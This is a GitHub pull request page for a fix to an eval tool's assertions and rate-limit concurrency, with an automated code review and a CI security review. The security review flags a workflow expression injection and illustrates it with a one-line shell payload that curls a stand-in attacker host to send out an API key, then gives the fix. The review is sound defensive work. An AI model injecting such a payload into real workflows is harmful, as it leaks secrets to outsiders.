fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090
fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090
Conversation
…1 concurrency Promptfoo returns tool call output as objects (not JSON strings) for some providers like Gemini. The JavaScript assertions now handle both string and object output formats. Also reduces GPT-4.1 concurrency from 20 to 5 to avoid 429 rate limiting. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
There was a problem hiding this comment.
Code Review
Blocking Issues
None.
Suggestions
parseInt(args.concurrency)inscripts/eval_skill_triggers_promptfoo.ts:142doesn't guard againstNaN(e.g.,--concurrency foo). A quickif (isNaN(concurrency))check with an error message would be more robust, though this is an internal CI tool with a sensible default so it's non-blocking.
Overall this is a clean, well-scoped fix. The assertion logic correctly handles both string and object output formats from different model providers, the [object Object] log fix is straightforward, and the per-model concurrency in the workflow matrix is a good approach to rate limit management.
There was a problem hiding this comment.
CI Security Review
Critical / High
None.
Medium
-
Pre-existing: Expression injection in
multi-model-eval.yml:36-37—${{ github.event.inputs.models || 'all' }}is interpolated directly in arun:block. A repo collaborator could inject shell commands via theworkflow_dispatchinput (e.g.,"; curl attacker.com/exfil?key=$ANTHROPIC_API_KEY #). This is pre-existing and NOT introduced by this PR, but worth noting. Fix: pass the input via anenv:variable instead of inline interpolation. -
denoland/setup-deno@v2not SHA-pinned (multi-model-eval.yml:49) — Pre-existing. The Deno team is a trusted publisher, but SHA-pinning third-party actions is best practice for supply chain security.
Low
None.
Verdict
PASS — The changes in this PR are security-neutral. They add per-model concurrency to the matrix (hardcoded integer values, no injection risk) and fix eval assertion logic in TypeScript files that don't affect CI security posture. The two medium findings are pre-existing and not introduced by this diff.
Summary
[object Object]in failure log output by serializing object responses before slicingTest Plan
deno fmt --checkpassesdeno lintpasses🤖 Generated with Claude Code